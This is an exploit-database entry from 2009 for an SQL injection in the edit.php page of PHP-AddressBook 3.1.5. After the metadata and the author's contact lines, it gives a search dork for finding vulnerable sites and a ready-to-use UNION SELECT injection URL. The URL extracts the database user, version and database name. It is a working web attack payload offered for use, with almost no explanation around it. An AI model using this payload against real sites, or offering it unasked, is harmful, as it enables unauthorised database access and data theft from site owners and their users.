PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2009-12-30  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comaddressbookv3.1.5.zip  

raw file: 10877.txt  
@   php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability


@    Author: Hussin X

@    Home :  www.iq-ty.com<http://www.iq-ty.com>,

@    email:  darkangel_g85[at]Yahoo[dot]com

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

@    script : http://sourceforge.net/project/showfiles.php?group_id=157964

@    DorK   : php-addressbook v3.1.5



ExPloiT :

www.[target].com/Script/edit.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14--




end

IQ-SecuritY FoRuM